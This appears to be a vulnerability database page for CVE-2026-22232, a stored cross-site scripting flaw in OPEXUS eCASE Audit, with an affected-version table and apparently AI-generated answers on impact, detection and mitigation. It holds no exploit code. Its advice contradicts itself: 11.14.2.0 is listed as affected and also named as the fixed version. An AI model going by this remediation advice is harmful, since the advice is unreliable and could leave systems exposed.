CVE-2026-22232
Stored Cross-Site Scripting in OPEXUS eCASE Audit Project Setup
Publication date: 2026-01-08
Last updated on: 2026-02-05
Assigner: Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| opexus | ecase_audit | 11.14.2.0 |
| opexustech | ecase_audit | From 11.4.0 (inc) to 11.14.2.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a stored Cross-Site Scripting (XSS) issue in OPEXUS eCASE Audit. An authenticated attacker can insert malicious JavaScript code into the "A or SIC Number" field within the Project Setup functionality. This malicious script is then executed whenever another user views the affected project, potentially allowing unauthorized actions or data exposure. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows an authenticated attacker to inject and execute JavaScript code within the application, which could lead to unauthorized actions or data exposure. Such risks may impact compliance with standards like GDPR and HIPAA that require protection of sensitive data and prevention of unauthorized access. The fixed version includes sanitization and escaping of user inputs to prevent these stored XSS attacks, thereby helping to maintain compliance by protecting user sessions and sensitive data. [1]
How can this vulnerability impact me? :
The vulnerability can lead to unauthorized execution of malicious scripts in the context of other users viewing the project. This can result in unauthorized actions, exposure of sensitive data, session hijacking, or other malicious activities that compromise user security and data integrity. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves stored Cross-Site Scripting (XSS) in the "A or SIC Number" field within the Project Setup functionality of OPEXUS eCASE Audit. Detection would involve inspecting the contents of this field for injected JavaScript code. Since it is a stored XSS, monitoring HTTP responses or database entries for suspicious script tags or JavaScript code in this field can help detect exploitation. Specific commands are not provided in the resources, but typical detection might include querying the database for script tags or using web application scanning tools to test input fields for script injection. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade OPEXUS eCASE Audit to version 11.14.2.0 or later, where the vulnerability is fixed by sanitizing and escaping user inputs in the affected fields to prevent stored XSS attacks. Until the upgrade, restrict authenticated user input in the "A or SIC Number" field and monitor for suspicious activity related to script injection. [1]